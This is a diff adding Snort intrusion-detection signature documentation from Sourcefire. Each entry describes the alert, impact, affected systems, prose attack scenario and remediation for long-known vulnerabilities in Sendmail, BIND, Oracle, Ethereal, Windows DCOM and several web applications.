+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0222
+
+Bugtraq
+http://www.securityfocus.com/bid/7453
+
+Other:
+http://archives.neohapsis.com/archives/bugtraq/2003-04/0360.html
+
+--
--- /dev/null
+++ b/doc/signatures/3052.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3052
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/264.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+264
+
+--
+Summary:
+This event is generated when spurious DNS traffic is detected on the network. 
+
+--
+Impact:
+Ranges from harmless to severe.  A successful corrupted DNS IP and name pairing can range from harmless (if the IP is not used) to severe (if a user is misdirected to a hostile host).
+
+--
+Detailed Information:
+This event indicates that abnormal DNS traffic has been detected. The implications are varied and careful investigation of the source and destination should be undertaken.
+
+This may be the result of an improperly configured DNS server or it may be an indication that an attack against the DNS server is underway.
+
+--
+Affected Systems:
+Any DNS server.
+
+--
+Attack Scenarios:
+An attacker can spoof a DNS response to misrepresent an IP to host/name pairing.  The forged host name can direct a user to a potentially hostile host.
+
+--
+Ease of Attack:
+Simple to Difficult depending on the DNS implementation.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Consider using DNSSEC where appropriate.
+
+Keep all DNS software up to date and correctly configured.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2224.txt
@@ -0,0 +1,54 @@
+Rule:  
+
+--
+Sid:
+2224
+
+--
+Summary:
+This event is generated when an attempt is made to access psunami.cgi on an internal web server. This may indicate an attempt to exploit a remote command execution vulnerability in Psunami bulletin board software.
+
+--
+Impact:
+Remote execution of arbitrary code, possibly leading to remote root compromise.
+
+--
+Detailed Information:
+Psunami is a CGI script that provides online bulletin board for web sites. It contains a metacharacter parsing vulnerability that allows an attacker to submit a URL that contains shell code between pipe characters (|) in the topic parameter. When the web server receives the HTTP request, it executes the code placed between the pipe characters.
+
+--
+Affected Systems:
+Any web server running Psunami 0.5.2 or earlier.
+
+--
+Attack Scenarios:
+An attacker places shellcode, surrounded by pipe characters, in the topic parameter of an HTTP request to psunami.cgi. Any commands included in the value are executed with the security context of the web server.
+ 
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses psunami.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to Psunami 0.5.3 (http://sourceforge.net/projects/psunami/).
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1066.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1066
+
+--
+Summary:
+This event is generated when an attempt is made to access telnet.exe on a remote
+web server via a web request.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to acess telnet.exe on a remote
+web server.  The attacker can use telnet to directly connect to other computers
+and launch attacks from the web server.
+
+This event indicates that an attempt has been made to execute the
+program telnet.exe using a web request.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+The attacker may use telnet to access other machines or compromise the
+resources on the target system.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000405.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000405
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "artedit.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "artedit.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1658.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1658
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1292.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid: 
+1292
+
+--
+Summary: 
+This may be post-compromise behavior indicating the use of Windows
+directory listing tools.
+
+--
+Impact: 
+Varies, an attacker might have gained an ability to execute commands remotely
+
+--
+Detailed Information:
+This rule is aimed at catching the standard Windows commands for
+listing directories. The string "Volume Serial Number" is typically shown in
+front of the directory listing on Windows NT/2000/XP.  Seeing such a
+response in the HTTP traffic indicates that somebody have managed to
+"convince" the web server to spawn a shell bound to a web port and
+have successfully executed at least one command to list the
+directory. Note that the source address of this signature is actually
+the victim and not the attacker as for the exploit signatures.
+
+--
+Affected Systems:
+	Microsoft Windows systems
+
+--
+Attack Scenarios:
+An attacker gains an access to a Windows web server via IIS vulnerability 
+and manages to start a cmd.exe shell. He then proceeds to look for 
+interesting files on the compromised server via the "dir" command.
+
+--
+Ease of Attack: 
+Simple. This post-attack behavior can accompany different attacks.
+
+--
+False Positives: 
+The rule will generate an event if the string "Volume Serial Number" appears in the 
+content distributed by the web server, in which case the rule should be 
+tuned.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action: 
+Investigate the web server for signs of compromise,
+
+Use system integrity checking software, check for other IDS alerts
+involving the same IP addresses.
+
+--
+Contributors: 
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2265.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2265
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-07.html
+
+--
--- /dev/null
+++ b/doc/signatures/1963.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1963
+
+--
+Summary:
+The RQUOTA daemon is an RPC server that returns quotas for users on the 
+local file systems.  
+
+Some versions of solaris ship with a vulnerable version of snoop that 
+attempts to parse RQUOTA GETQUOTA requests.  Snoop contains a boundary 
+condition error that could result in a buffer overflow that will present
+the attacker with super user access to the target host.
+
+--
+Impact:
+Complete control of the target machine.
+
+--
+Detailed Information:
+The sniffing program named snoop is installed on certain version of Sun 
+Solaris.
+
+When run by the super-user, snoop will monitor network traffic on the 
+host's network segment.  When snoop attempts to decode RQUOTA GETQUOTA 
+requests, snoop does not properly handle user supplied data resulting in
+a buffer overflow.
+
+--
+Affected Systems:
+	Sun Solaris 2.4, 2.5, 2.5.1, 2.6, 2.7 for SPARC and Intel architectures
+
+--
+Attack Scenarios:
+The attacker must send specially crafted packets past a network segment 
+monitored by vulnerable versions of snoop
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate patches for each affected system.
+
+Use a different network monitoring tool other than snoop.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000686.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+100000686
+
+--
+Summary:
+This event is generated when an empty CTCP NOTICE message is sent to an IRC 
+channel.
+
+--
+Impact:
+If the EnergyMech IRC Bot receives such a message, a denial of service 
+condition will occur.
+
+--
+Detailed Information:
+Whenever the EnergyMech IRC Bot processes a null CTCP NOTICE message, a denial 
+of service condition occurs. Note that this rule is set to examine only default 
+IRC ports, in order to conserve system resources; if you are particularly 
+concerned about this exploit, you may wish to set the ports to "any", as IRC 
+channels can exist on any port.
+
+--
+Affected Systems:
+EnergyMech <= 3.0.1
+
+--
+Attack Scenarios:
+An attacker could exploit this vulnerability via any IRC client, or by using an 
+automated script.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to version 3.0.2 or greater.
+
+--
+Contributors:
+VeriSign MSS Operations Team
+Joel Esler <joel.esler@sourcefire.com>
+
+--
+Additional References:
+http://www.energymech.net/versions-3.0.html
+
+--
--- /dev/null
+++ b/doc/signatures/1677.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1677
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/670.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+670
+
+--
+Summary:
+This event is generated when an external attacker attempts to use a specific exploit against Sendmail that allows the attacker to execute remote commands on the server, and to email files from the server to a remote email account.
+
+--
+Impact:
+Severe. Remote execution of arbitrary code, possibly leading to remote root compromise, or at the very least, information disclosure. 
+
+--
+Detailed Information:
+Sendmail 8.6.9 and earlier contain a vulnerability related to the parsing of commands passed from ident to Sendmail. An attacker can use a specific exploit to send a message through the mail server. The message is not properly parsed and Sendmail forwards the response, with included commands, to its queue. The commands are then executed while the message awaits delivery in the Sendmail queue, causing the included arbitrary code to be executed on the server in the security context of Sendmail. The exploit in question allows the attacker to execute commands to email files from the server to a remote email account.
+
+--
+Affected Systems:
+Systems running unpatched versions of Sendmail 8.6.9 or earlier.
+
+--
+Attack Scenarios:
+An attacker sends an email generated by the exploit, and customizes it to mail the server's password file to a remote email account. The attacker then cracks the passwords in the password file and is able to access the server directly.
+
+--
+Ease of Attack:
+Simple. An exploit exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to Sendmail 8.6.10 or higher.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0204
+
+Bugtraq
+http://www.securityfocus.com/bid/2311
+
+--
--- /dev/null
+++ b/doc/signatures/634.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+634
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain which ports a host may be listening on, whether or not the ports are filtered by a firewall and if the host is vulnerable to a particular exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker can determine if ports 21 and 20 are being used for FTP. Then the attacker might find out that the FTP service is vulnerable to a particular attack and is then able to compromise the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000496.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000496
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "Chipmailer" application running on a webserver. Access to 
+the file "index.php" with SQL commands being passed as the "anfang" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "anfang" parameter in the "index.php" script used by the 
+"Chipmailer" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Chipmailer
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/2205.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+2205
+
+--
+Summary:
+This event is generated when an attempt is made to access ezboard.cgi on an internal web server. This may indicate an attempt to exploit a buffer overflow vulnerability in EasyBoard 2000 1.27.
+
+--
+Impact:
+Remote execution of arbitrary code, possibly leading to remote root compromise.
+
+--
+Detailed Information:
+EasyBoard 2000 (EZBoard) is CGI-based bulletin board software for web servers. It contains a vulnerability that allows a malicious user to craft an HTTP request that causes a buffer overflow condition on the web server, and can overwrite system memory with data included in the URL. This enables the attacker to execute arbitrary code on the server with the security context of the web server.
+
+
+--
+Affected Systems:
+Systems running EasyBoard 2000 1.27.
+
+--
+Attack Scenarios:
+An attacker sends a specially crafted HTTP request to ezboard.cgi on a vulnerable web server, creating a buffer overflow condition. The attacker is then able to execute arbitrary code with the security context of the web server. 
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses ezboard.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is not known if this vulnerability has been patched by the vendor. However, Jin Ho Yu has submitted a third-party fix to the Bugtraq list. See http://marc.theaimsgroup.com/?l=bugtraq&m=101345069220199&w=2 for ezboard-fix.pl. 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/4068
+
+--
--- /dev/null
+++ b/doc/signatures/2872.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2872
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_number
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2918.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2918
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure validate_for_local_flavor
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000378.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000378
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_forums.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_forums.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3353.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3353
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/260.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+261
+
+--
+Summary:
+This event is generated by an attempted buffer overflow associated with improperly formatted DNS inverse queries. 
+
+--
+Impact:
+Severe. The DNS server can be compromised allowing the attacker access at the privilege level at which BIND runs.  
+
+--
+Detailed Information:
+Certain versions of BIND do no perform correct bounds checking when responding to an inverse query. A maliciously formatted inverse query can cause the DNS server to crash and allow remote access with the privileges of the user running BIND.  Inverse queries are disabled by default; this attack can affect DNS servers that have been configured to enable them.
+
+--
+Affected Systems:
+BIND 4.9 releases prior to 4.9.7 and BIND 8 releases prior to 8.1.2. 
+
+--
+Attack Scenarios:
+An attacker can launch this exploit to gain remote access to the DNS server.
+
+--
+Ease of Attack:
+Simple.  Code exists to exploit the buffer overflow.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to a version of BIND that is not vulnerable to this attack.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-1998-05.html
+
+
+--
--- /dev/null
+++ b/doc/signatures/110-3.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+110-3
+
+--
+Summary:
+This event is generated when the pre-processor spp_unidecode detects
+network traffic that may constitute an attack. Specifically an unknown
+mapping was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_unidecode pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000171.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+100000171
+
+-- 
